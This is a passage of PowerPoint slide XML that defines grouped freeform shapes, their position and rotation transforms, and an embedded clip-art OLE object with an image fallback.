                  <a:gd name="T102" fmla="*/ 0 w 1464"/>
                  <a:gd name="T103" fmla="*/ 0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0" name="Freeform 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86160888-98EC-D41F-2A76-0C1D55D9EBBB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2227" y="3584"/>
                <a:ext cx="388" cy="205"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1942"/>
                  <a:gd name="T1" fmla="*/ 0 h 1028"/>
                  <a:gd name="T2" fmla="*/ 0 w 1942"/>
                  <a:gd name="T3" fmla="*/ 0 h 1028"/>
                  <a:gd name="T4" fmla="*/ 0 w 1942"/>
                  <a:gd name="T5" fmla="*/ 0 h 1028"/>
                  <a:gd name="T6" fmla="*/ 0 w 1942"/>
                  <a:gd name="T7" fmla="*/ 0 h 1028"/>
                  <a:gd name="T8" fmla="*/ 0 w 1942"/>
                  <a:gd name="T9" fmla="*/ 0 h 1028"/>
                  <a:gd name="T10" fmla="*/ 0 w 1942"/>
                  <a:gd name="T11" fmla="*/ 0 h 1028"/>
                  <a:gd name="T12" fmla="*/ 0 w 1942"/>
                  <a:gd name="T13" fmla="*/ 0 h 1028"/>
                  <a:gd name="T14" fmla="*/ 0 w 1942"/>
                  <a:gd name="T15" fmla="*/ 0 h 1028"/>
                  <a:gd name="T16" fmla="*/ 0 w 1942"/>
                  <a:gd name="T17" fmla="*/ 0 h 1028"/>
                  <a:gd name="T18" fmla="*/ 0 w 1942"/>
                  <a:gd name="T19" fmla="*/ 0 h 1028"/>
                  <a:gd name="T20" fmla="*/ 0 w 1942"/>
                  <a:gd name="T21" fmla="*/ 0 h 1028"/>
                  <a:gd name="T22" fmla="*/ 0 w 1942"/>
                  <a:gd name="T23" fmla="*/ 0 h 1028"/>
                  <a:gd name="T24" fmla="*/ 0 w 1942"/>
                  <a:gd name="T25" fmla="*/ 0 h 1028"/>
                  <a:gd name="T26" fmla="*/ 0 w 1942"/>
                  <a:gd name="T27" fmla="*/ 0 h 1028"/>
                  <a:gd name="T28" fmla="*/ 0 w 1942"/>
                  <a:gd name="T29" fmla="*/ 0 h 1028"/>
                  <a:gd name="T30" fmla="*/ 0 w 1942"/>
                  <a:gd name="T31" fmla="*/ 0 h 1028"/>
                  <a:gd name="T32" fmla="*/ 0 w 1942"/>
                  <a:gd name="T33" fmla="*/ 0 h 1028"/>
                  <a:gd name="T34" fmla="*/ 0 w 1942"/>
                  <a:gd name="T35" fmla="*/ 0 h 1028"/>
                  <a:gd name="T36" fmla="*/ 0 w 1942"/>
                  <a:gd name="T37" fmla="*/ 0 h 1028"/>
                  <a:gd name="T38" fmla="*/ 0 w 1942"/>
                  <a:gd name="T39" fmla="*/ 0 h 1028"/>
                  <a:gd name="T40" fmla="*/ 0 w 1942"/>
                  <a:gd name="T41" fmla="*/ 0 h 1028"/>
                  <a:gd name="T42" fmla="*/ 0 w 1942"/>
                  <a:gd name="T43" fmla="*/ 0 h 1028"/>
                  <a:gd name="T44" fmla="*/ 0 w 1942"/>
                  <a:gd name="T45" fmla="*/ 0 h 1028"/>
                  <a:gd name="T46" fmla="*/ 0 w 1942"/>
                  <a:gd name="T47" fmla="*/ 0 h 1028"/>
                  <a:gd name="T48" fmla="*/ 0 w 1942"/>
                  <a:gd name="T49" fmla="*/ 0 h 1028"/>
                  <a:gd name="T50" fmla="*/ 0 w 1942"/>
                  <a:gd name="T51" fmla="*/ 0 h 1028"/>
                  <a:gd name="T52" fmla="*/ 0 w 1942"/>
                  <a:gd name="T53" fmla="*/ 0 h 1028"/>
                  <a:gd name="T54" fmla="*/ 0 w 1942"/>
                  <a:gd name="T55" fmla="*/ 0 h 1028"/>
                  <a:gd name="T56" fmla="*/ 0 w 1942"/>
                  <a:gd name="T57" fmla="*/ 0 h 1028"/>
                  <a:gd name="T58" fmla="*/ 0 w 1942"/>
                  <a:gd name="T59" fmla="*/ 0 h 1028"/>
                  <a:gd name="T60" fmla="*/ 0 w 1942"/>
                  <a:gd name="T61" fmla="*/ 0 h 1028"/>
                  <a:gd name="T62" fmla="*/ 0 w 1942"/>
                  <a:gd name="T63" fmla="*/ 0 h 1028"/>
                  <a:gd name="T64" fmla="*/ 0 w 1942"/>
                  <a:gd name="T65" fmla="*/ 0 h 1028"/>
                  <a:gd name="T66" fmla="*/ 0 w 1942"/>
                  <a:gd name="T67" fmla="*/ 0 h 1028"/>
                  <a:gd name="T68" fmla="*/ 0 w 1942"/>
                  <a:gd name="T69" fmla="*/ 0 h 1028"/>
                  <a:gd name="T70" fmla="*/ 0 w 1942"/>
                  <a:gd name="T71" fmla="*/ 0 h 1028"/>
                  <a:gd name="T72" fmla="*/ 0 w 1942"/>
                  <a:gd name="T73" fmla="*/ 0 h 1028"/>
                  <a:gd name="T74" fmla="*/ 0 w 1942"/>
                  <a:gd name="T75" fmla="*/ 0 h 1028"/>
                  <a:gd name="T76" fmla="*/ 0 w 1942"/>
                  <a:gd name="T77" fmla="*/ 0 h 1028"/>
                  <a:gd name="T78" fmla="*/ 0 w 1942"/>
                  <a:gd name="T79" fmla="*/ 0 h 1028"/>
                  <a:gd name="T80" fmla="*/ 0 w 1942"/>
                  <a:gd name="T81" fmla="*/ 0 h 1028"/>
                  <a:gd name="T82" fmla="*/ 0 w 1942"/>
                  <a:gd name="T83" fmla="*/ 0 h 1028"/>
                  <a:gd name="T84" fmla="*/ 0 w 1942"/>
                  <a:gd name="T85" fmla="*/ 0 h 1028"/>
                  <a:gd name="T86" fmla="*/ 0 w 1942"/>
                  <a:gd name="T87" fmla="*/ 0 h 1028"/>
                  <a:gd name="T88" fmla="*/ 0 w 1942"/>
                  <a:gd name="T89" fmla="*/ 0 h 1028"/>
                  <a:gd name="T90" fmla="*/ 0 w 1942"/>
                  <a:gd name="T91" fmla="*/ 0 h 1028"/>
                  <a:gd name="T92" fmla="*/ 0 w 1942"/>
                  <a:gd name="T93" fmla="*/ 0 h 1028"/>
                  <a:gd name="T94" fmla="*/ 0 w 1942"/>
                  <a:gd name="T95" fmla="*/ 0 h 1028"/>
                  <a:gd name="T96" fmla="*/ 0 w 1942"/>
                  <a:gd name="T97" fmla="*/ 0 h 1028"/>
                  <a:gd name="T98" fmla="*/ 0 w 1942"/>
                  <a:gd name="T99" fmla="*/ 0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1" name="Freeform 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{539262DB-7700-4436-7B1C-744E372372F6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2160" y="3361"/>
                <a:ext cx="197" cy="367"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 985"/>
                  <a:gd name="T1" fmla="*/ 0 h 1832"/>
                  <a:gd name="T2" fmla="*/ 0 w 985"/>
                  <a:gd name="T3" fmla="*/ 0 h 1832"/>
                  <a:gd name="T4" fmla="*/ 0 w 985"/>
                  <a:gd name="T5" fmla="*/ 0 h 1832"/>
                  <a:gd name="T6" fmla="*/ 0 w 985"/>
                  <a:gd name="T7" fmla="*/ 0 h 1832"/>
                  <a:gd name="T8" fmla="*/ 0 w 985"/>
                  <a:gd name="T9" fmla="*/ 0 h 1832"/>
                  <a:gd name="T10" fmla="*/ 0 w 985"/>
                  <a:gd name="T11" fmla="*/ 0 h 1832"/>
                  <a:gd name="T12" fmla="*/ 0 w 985"/>
                  <a:gd name="T13" fmla="*/ 0 h 1832"/>
                  <a:gd name="T14" fmla="*/ 0 w 985"/>
                  <a:gd name="T15" fmla="*/ 0 h 1832"/>
                  <a:gd name="T16" fmla="*/ 0 w 985"/>
                  <a:gd name="T17" fmla="*/ 0 h 1832"/>
                  <a:gd name="T18" fmla="*/ 0 w 985"/>
                  <a:gd name="T19" fmla="*/ 0 h 1832"/>
                  <a:gd name="T20" fmla="*/ 0 w 985"/>
                  <a:gd name="T21" fmla="*/ 0 h 1832"/>
                  <a:gd name="T22" fmla="*/ 0 w 985"/>
                  <a:gd name="T23" fmla="*/ 0 h 1832"/>
                  <a:gd name="T24" fmla="*/ 0 w 985"/>
                  <a:gd name="T25" fmla="*/ 0 h 1832"/>
                  <a:gd name="T26" fmla="*/ 0 w 985"/>
                  <a:gd name="T27" fmla="*/ 0 h 1832"/>
                  <a:gd name="T28" fmla="*/ 0 w 985"/>
                  <a:gd name="T29" fmla="*/ 0 h 1832"/>
                  <a:gd name="T30" fmla="*/ 0 w 985"/>
                  <a:gd name="T31" fmla="*/ 0 h 1832"/>
                  <a:gd name="T32" fmla="*/ 0 w 985"/>
                  <a:gd name="T33" fmla="*/ 0 h 1832"/>
                  <a:gd name="T34" fmla="*/ 0 w 985"/>
                  <a:gd name="T35" fmla="*/ 0 h 1832"/>
                  <a:gd name="T36" fmla="*/ 0 w 985"/>
                  <a:gd name="T37" fmla="*/ 0 h 1832"/>
                  <a:gd name="T38" fmla="*/ 0 w 985"/>
                  <a:gd name="T39" fmla="*/ 0 h 1832"/>
                  <a:gd name="T40" fmla="*/ 0 w 985"/>
                  <a:gd name="T41" fmla="*/ 0 h 1832"/>
                  <a:gd name="T42" fmla="*/ 0 w 985"/>
                  <a:gd name="T43" fmla="*/ 0 h 1832"/>
                  <a:gd name="T44" fmla="*/ 0 w 985"/>
                  <a:gd name="T45" fmla="*/ 0 h 1832"/>
                  <a:gd name="T46" fmla="*/ 0 w 985"/>
                  <a:gd name="T47" fmla="*/ 0 h 1832"/>
                  <a:gd name="T48" fmla="*/ 0 w 985"/>
                  <a:gd name="T49" fmla="*/ 0 h 1832"/>
                  <a:gd name="T50" fmla="*/ 0 w 985"/>
                  <a:gd name="T51" fmla="*/ 0 h 1832"/>
                  <a:gd name="T52" fmla="*/ 0 w 985"/>
                  <a:gd name="T53" fmla="*/ 0 h 1832"/>
                  <a:gd name="T54" fmla="*/ 0 w 985"/>
                  <a:gd name="T55" fmla="*/ 0 h 1832"/>
                  <a:gd name="T56" fmla="*/ 0 w 985"/>
                  <a:gd name="T57" fmla="*/ 0 h 1832"/>
                  <a:gd name="T58" fmla="*/ 0 w 985"/>
                  <a:gd name="T59" fmla="*/ 0 h 1832"/>
                  <a:gd name="T60" fmla="*/ 0 w 985"/>
                  <a:gd name="T61" fmla="*/ 0 h 1832"/>
                  <a:gd name="T62" fmla="*/ 0 w 985"/>
                  <a:gd name="T63" fmla="*/ 0 h 1832"/>
                  <a:gd name="T64" fmla="*/ 0 w 985"/>
                  <a:gd name="T65" fmla="*/ 0 h 1832"/>
                  <a:gd name="T66" fmla="*/ 0 w 985"/>
                  <a:gd name="T67" fmla="*/ 0 h 1832"/>
                  <a:gd name="T68" fmla="*/ 0 w 985"/>
                  <a:gd name="T69" fmla="*/ 0 h 1832"/>
                  <a:gd name="T70" fmla="*/ 0 w 985"/>
                  <a:gd name="T71" fmla="*/ 0 h 1832"/>
                  <a:gd name="T72" fmla="*/ 0 w 985"/>
                  <a:gd name="T73" fmla="*/ 0 h 1832"/>
                  <a:gd name="T74" fmla="*/ 0 w 985"/>
                  <a:gd name="T75" fmla="*/ 0 h 1832"/>
                  <a:gd name="T76" fmla="*/ 0 w 985"/>
                  <a:gd name="T77" fmla="*/ 0 h 1832"/>
                  <a:gd name="T78" fmla="*/ 0 w 985"/>
                  <a:gd name="T79" fmla="*/ 0 h 1832"/>
                  <a:gd name="T80" fmla="*/ 0 w 985"/>
                  <a:gd name="T81" fmla="*/ 0 h 1832"/>
                  <a:gd name="T82" fmla="*/ 0 w 985"/>
                  <a:gd name="T83" fmla="*/ 0 h 1832"/>
                  <a:gd name="T84" fmla="*/ 0 w 985"/>
                  <a:gd name="T85" fmla="*/ 0 h 1832"/>
                  <a:gd name="T86" fmla="*/ 0 w 985"/>
                  <a:gd name="T87" fmla="*/ 0 h 1832"/>
                  <a:gd name="T88" fmla="*/ 0 w 985"/>
                  <a:gd name="T89" fmla="*/ 0 h 1832"/>
                  <a:gd name="T90" fmla="*/ 0 w 985"/>
                  <a:gd name="T91" fmla="*/ 0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2" name="Freeform 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07B47287-7750-FDFF-82DA-6E51E475EA6A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2312" y="3312"/>
                <a:ext cx="293" cy="331"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1464"/>
                  <a:gd name="T1" fmla="*/ 0 h 1658"/>
                  <a:gd name="T2" fmla="*/ 0 w 1464"/>
                  <a:gd name="T3" fmla="*/ 0 h 1658"/>
                  <a:gd name="T4" fmla="*/ 0 w 1464"/>
                  <a:gd name="T5" fmla="*/ 0 h 1658"/>
                  <a:gd name="T6" fmla="*/ 0 w 1464"/>
                  <a:gd name="T7" fmla="*/ 0 h 1658"/>
                  <a:gd name="T8" fmla="*/ 0 w 1464"/>
                  <a:gd name="T9" fmla="*/ 0 h 1658"/>
                  <a:gd name="T10" fmla="*/ 0 w 1464"/>
                  <a:gd name="T11" fmla="*/ 0 h 1658"/>
                  <a:gd name="T12" fmla="*/ 0 w 1464"/>
                  <a:gd name="T13" fmla="*/ 0 h 1658"/>
                  <a:gd name="T14" fmla="*/ 0 w 1464"/>
                  <a:gd name="T15" fmla="*/ 0 h 1658"/>
                  <a:gd name="T16" fmla="*/ 0 w 1464"/>
                  <a:gd name="T17" fmla="*/ 0 h 1658"/>
                  <a:gd name="T18" fmla="*/ 0 w 1464"/>
                  <a:gd name="T19" fmla="*/ 0 h 1658"/>
                  <a:gd name="T20" fmla="*/ 0 w 1464"/>
                  <a:gd name="T21" fmla="*/ 0 h 1658"/>
                  <a:gd name="T22" fmla="*/ 0 w 1464"/>
                  <a:gd name="T23" fmla="*/ 0 h 1658"/>
                  <a:gd name="T24" fmla="*/ 0 w 1464"/>
                  <a:gd name="T25" fmla="*/ 0 h 1658"/>
                  <a:gd name="T26" fmla="*/ 0 w 1464"/>
                  <a:gd name="T27" fmla="*/ 0 h 1658"/>
                  <a:gd name="T28" fmla="*/ 0 w 1464"/>
                  <a:gd name="T29" fmla="*/ 0 h 1658"/>
                  <a:gd name="T30" fmla="*/ 0 w 1464"/>
                  <a:gd name="T31" fmla="*/ 0 h 1658"/>
                  <a:gd name="T32" fmla="*/ 0 w 1464"/>
                  <a:gd name="T33" fmla="*/ 0 h 1658"/>
                  <a:gd name="T34" fmla="*/ 0 w 1464"/>
                  <a:gd name="T35" fmla="*/ 0 h 1658"/>
                  <a:gd name="T36" fmla="*/ 0 w 1464"/>
                  <a:gd name="T37" fmla="*/ 0 h 1658"/>
                  <a:gd name="T38" fmla="*/ 0 w 1464"/>
                  <a:gd name="T39" fmla="*/ 0 h 1658"/>
                  <a:gd name="T40" fmla="*/ 0 w 1464"/>
                  <a:gd name="T41" fmla="*/ 0 h 1658"/>
                  <a:gd name="T42" fmla="*/ 0 w 1464"/>
                  <a:gd name="T43" fmla="*/ 0 h 1658"/>
                  <a:gd name="T44" fmla="*/ 0 w 1464"/>
                  <a:gd name="T45" fmla="*/ 0 h 1658"/>
                  <a:gd name="T46" fmla="*/ 0 w 1464"/>
                  <a:gd name="T47" fmla="*/ 0 h 1658"/>
                  <a:gd name="T48" fmla="*/ 0 w 1464"/>
                  <a:gd name="T49" fmla="*/ 0 h 1658"/>
                  <a:gd name="T50" fmla="*/ 0 w 1464"/>
                  <a:gd name="T51" fmla="*/ 0 h 1658"/>
                  <a:gd name="T52" fmla="*/ 0 w 1464"/>
                  <a:gd name="T53" fmla="*/ 0 h 1658"/>
                  <a:gd name="T54" fmla="*/ 0 w 1464"/>
                  <a:gd name="T55" fmla="*/ 0 h 1658"/>
                  <a:gd name="T56" fmla="*/ 0 w 1464"/>
                  <a:gd name="T57" fmla="*/ 0 h 1658"/>
                  <a:gd name="T58" fmla="*/ 0 w 1464"/>
                  <a:gd name="T59" fmla="*/ 0 h 1658"/>
                  <a:gd name="T60" fmla="*/ 0 w 1464"/>
                  <a:gd name="T61" fmla="*/ 0 h 1658"/>
                  <a:gd name="T62" fmla="*/ 0 w 1464"/>
                  <a:gd name="T63" fmla="*/ 0 h 1658"/>
                  <a:gd name="T64" fmla="*/ 0 w 1464"/>
                  <a:gd name="T65" fmla="*/ 0 h 1658"/>
                  <a:gd name="T66" fmla="*/ 0 w 1464"/>
                  <a:gd name="T67" fmla="*/ 0 h 1658"/>
                  <a:gd name="T68" fmla="*/ 0 w 1464"/>
                  <a:gd name="T69" fmla="*/ 0 h 1658"/>
                  <a:gd name="T70" fmla="*/ 0 w 1464"/>
                  <a:gd name="T71" fmla="*/ 0 h 1658"/>
                  <a:gd name="T72" fmla="*/ 0 w 1464"/>
                  <a:gd name="T73" fmla="*/ 0 h 1658"/>
                  <a:gd name="T74" fmla="*/ 0 w 1464"/>
                  <a:gd name="T75" fmla="*/ 0 h 1658"/>
                  <a:gd name="T76" fmla="*/ 0 w 1464"/>
                  <a:gd name="T77" fmla="*/ 0 h 1658"/>
                  <a:gd name="T78" fmla="*/ 0 w 1464"/>
                  <a:gd name="T79" fmla="*/ 0 h 1658"/>
                  <a:gd name="T80" fmla="*/ 0 w 1464"/>
                  <a:gd name="T81" fmla="*/ 0 h 1658"/>
                  <a:gd name="T82" fmla="*/ 0 w 1464"/>
                  <a:gd name="T83" fmla="*/ 0 h 1658"/>
                  <a:gd name="T84" fmla="*/ 0 w 1464"/>
                  <a:gd name="T85" fmla="*/ 0 h 1658"/>
                  <a:gd name="T86" fmla="*/ 0 w 1464"/>
                  <a:gd name="T87" fmla="*/ 0 h 1658"/>
                  <a:gd name="T88" fmla="*/ 0 w 1464"/>
                  <a:gd name="T89" fmla="*/ 0 h 1658"/>
                  <a:gd name="T90" fmla="*/ 0 w 1464"/>
                  <a:gd name="T91" fmla="*/ 0 h 1658"/>
                  <a:gd name="T92" fmla="*/ 0 w 1464"/>
                  <a:gd name="T93" fmla="*/ 0 h 1658"/>
                  <a:gd name="T94" fmla="*/ 0 w 1464"/>
                  <a:gd name="T95" fmla="*/ 0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grpSp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="168" name="Object 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7D02A7B-6FAE-3018-B8D3-CE9F09A95E75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3120" y="3408"/>
            <a:ext cx="798" cy="612"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s6362" name="Clip" r:id="rId19" imgW="1270571" imgH="967141" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId19" imgW="1270571" imgH="967141" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="168" name="Object 105">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7D02A7B-6FAE-3018-B8D3-CE9F09A95E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3408"/>
                          <a:ext cx="79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3" name="Group 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C1F2266-C73C-51A0-A563-314D51B10C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6388380" y="3988746"/>
            <a:ext cx="961317" cy="686440"/>
            <a:chOff x="4128" y="3444"/>
            <a:chExt cx="798" cy="612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="174" name="Group 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC8FCBDA-20FE-A7AD-7757-FBC98924E994}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="7488645">
              <a:off x="4283" y="3493"/>
              <a:ext cx="455" cy="477"/>
              <a:chOff x="2160" y="3312"/>
              <a:chExt cx="455" cy="477"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="176" name="Freeform 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77CAC136-13F2-5335-862B-12749FEE6233}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2312" y="3312"/>
                <a:ext cx="293" cy="369"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1464"/>
                  <a:gd name="T1" fmla="*/ 0 h 1849"/>
                  <a:gd name="T2" fmla="*/ 0 w 1464"/>
                  <a:gd name="T3" fmla="*/ 0 h 1849"/>
                  <a:gd name="T4" fmla="*/ 0 w 1464"/>
                  <a:gd name="T5" fmla="*/ 0 h 1849"/>
                  <a:gd name="T6" fmla="*/ 0 w 1464"/>
                  <a:gd name="T7" fmla="*/ 0 h 1849"/>
                  <a:gd name="T8" fmla="*/ 0 w 1464"/>
                  <a:gd name="T9" fmla="*/ 0 h 1849"/>
                  <a:gd name="T10" fmla="*/ 0 w 1464"/>
                  <a:gd name="T11" fmla="*/ 0 h 1849"/>
                  <a:gd name="T12" fmla="*/ 0 w 1464"/>
                  <a:gd name="T13" fmla="*/ 0 h 1849"/>
                  <a:gd name="T14" fmla="*/ 0 w 1464"/>
                  <a:gd name="T15" fmla="*/ 0 h 1849"/>
                  <a:gd name="T16" fmla="*/ 0 w 1464"/>
                  <a:gd name="T17" fmla="*/ 0 h 1849"/>
                  <a:gd name="T18" fmla="*/ 0 w 1464"/>
                  <a:gd name="T19" fmla="*/ 0 h 1849"/>
                  <a:gd name="T20" fmla="*/ 0 w 1464"/>
                  <a:gd name="T21" fmla="*/ 0 h 1849"/>
                  <a:gd name="T22" fmla="*/ 0 w 1464"/>
                  <a:gd name="T23" fmla="*/ 0 h 1849"/>
                  <a:gd name="T24" fmla="*/ 0 w 1464"/>
                  <a:gd name="T25" fmla="*/ 0 h 1849"/>
                  <a:gd name="T26" fmla="*/ 0 w 1464"/>
                  <a:gd name="T27" fmla="*/ 0 h 1849"/>
                  <a:gd name="T28" fmla="*/ 0 w 1464"/>
                  <a:gd name="T29" fmla="*/ 0 h 1849"/>
                  <a:gd name="T30" fmla="*/ 0 w 1464"/>
                  <a:gd name="T31" fmla="*/ 0 h 1849"/>
                  <a:gd name="T32" fmla="*/ 0 w 1464"/>
                  <a:gd name="T33" fmla="*/ 0 h 1849"/>
                  <a:gd name="T34" fmla="*/ 0 w 1464"/>
                  <a:gd name="T35" fmla="*/ 0 h 1849"/>
                  <a:gd name="T36" fmla="*/ 0 w 1464"/>
                  <a:gd name="T37" fmla="*/ 0 h 1849"/>
                  <a:gd name="T38" fmla="*/ 0 w 1464"/>
                  <a:gd name="T39" fmla="*/ 0 h 1849"/>
                  <a:gd name="T40" fmla="*/ 0 w 1464"/>
                  <a:gd name="T41" fmla="*/ 0 h 1849"/>
                  <a:gd name="T42" fmla="*/ 0 w 1464"/>
                  <a:gd name="T43" fmla="*/ 0 h 1849"/>
                  <a:gd name="T44" fmla="*/ 0 w 1464"/>
                  <a:gd name="T45" fmla="*/ 0 h 1849"/>
                  <a:gd name="T46" fmla="*/ 0 w 1464"/>
                  <a:gd name="T47" fmla="*/ 0 h 1849"/>
                  <a:gd name="T48" fmla="*/ 0 w 1464"/>
                  <a:gd name="T49" fmla="*/ 0 h 1849"/>
                  <a:gd name="T50" fmla="*/ 0 w 1464"/>
                  <a:gd name="T51" fmla="*/ 0 h 1849"/>
                  <a:gd name="T52" fmla="*/ 0 w 1464"/>
                  <a:gd name="T53" fmla="*/ 0 h 1849"/>
                  <a:gd name="T54" fmla="*/ 0 w 1464"/>
                  <a:gd name="T55" fmla="*/ 0 h 1849"/>
                  <a:gd name="T56" fmla="*/ 0 w 1464"/>
                  <a:gd name="T57" fmla="*/ 0 h 1849"/>
                  <a:gd name="T58" fmla="*/ 0 w 1464"/>
                  <a:gd name="T59" fmla="*/ 0 h 1849"/>
                  <a:gd name="T60" fmla="*/ 0 w 1464"/>
                  <a:gd name="T61" fmla="*/ 0 h 1849"/>
                  <a:gd name="T62" fmla="*/ 0 w 1464"/>
                  <a:gd name="T63" fmla="*/ 0 h 1849"/>
                  <a:gd name="T64" fmla="*/ 0 w 1464"/>
                  <a:gd name="T65" fmla="*/ 0 h 1849"/>
                  <a:gd name="T66" fmla="*/ 0 w 1464"/>
                  <a:gd name="T67" fmla="*/ 0 h 1849"/>
                  <a:gd name="T68" fmla="*/ 0 w 1464"/>
                  <a:gd name="T69" fmla="*/ 0 h 1849"/>
                  <a:gd name="T70" fmla="*/ 0 w 1464"/>
                  <a:gd name="T71" fmla="*/ 0 h 1849"/>
                  <a:gd name="T72" fmla="*/ 0 w 1464"/>
                  <a:gd name="T73" fmla="*/ 0 h 1849"/>
                  <a:gd name="T74" fmla="*/ 0 w 1464"/>
                  <a:gd name="T75" fmla="*/ 0 h 1849"/>
                  <a:gd name="T76" fmla="*/ 0 w 1464"/>
                  <a:gd name="T77" fmla="*/ 0 h 1849"/>
                  <a:gd name="T78" fmla="*/ 0 w 1464"/>
                  <a:gd name="T79" fmla="*/ 0 h 1849"/>
                  <a:gd name="T80" fmla="*/ 0 w 1464"/>
                  <a:gd name="T81" fmla="*/ 0 h 1849"/>
                  <a:gd name="T82" fmla="*/ 0 w 1464"/>
                  <a:gd name="T83" fmla="*/ 0 h 1849"/>
                  <a:gd name="T84" fmla="*/ 0 w 1464"/>
                  <a:gd name="T85" fmla="*/ 0 h 1849"/>
                  <a:gd name="T86" fmla="*/ 0 w 1464"/>
                  <a:gd name="T87" fmla="*/ 0 h 1849"/>
                  <a:gd name="T88" fmla="*/ 0 w 1464"/>
                  <a:gd name="T89" fmla="*/ 0 h 1849"/>
                  <a:gd name="T90" fmla="*/ 0 w 1464"/>
                  <a:gd name="T91" fmla="*/ 0 h 1849"/>
                  <a:gd name="T92" fmla="*/ 0 w 1464"/>
                  <a:gd name="T93" fmla="*/ 0 h 1849"/>
                  <a:gd name="T94" fmla="*/ 0 w 1464"/>
                  <a:gd name="T95" fmla="*/ 0 h 1849"/>
                  <a:gd name="T96" fmla="*/ 0 w 1464"/>
                  <a:gd name="T97" fmla="*/ 0 h 1849"/>
                  <a:gd name="T98" fmla="*/ 0 w 1464"/>
                  <a:gd name="T99" fmla="*/ 0 h 1849"/>
                  <a:gd name="T100" fmla="*/ 0 w 1464"/>
                  <a:gd name="T101" fmla="*/ 0 h 1849"/>
                  <a:gd name="T102" fmla="*/ 0 w 1464"/>
                  <a:gd name="T103" fmla="*/ 0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7" name="Freeform 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B127640-2994-5559-3847-EBAE37AD6B6A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2227" y="3584"/>
                <a:ext cx="388" cy="205"/>
              </a:xfrm>
              <a:custGeom>
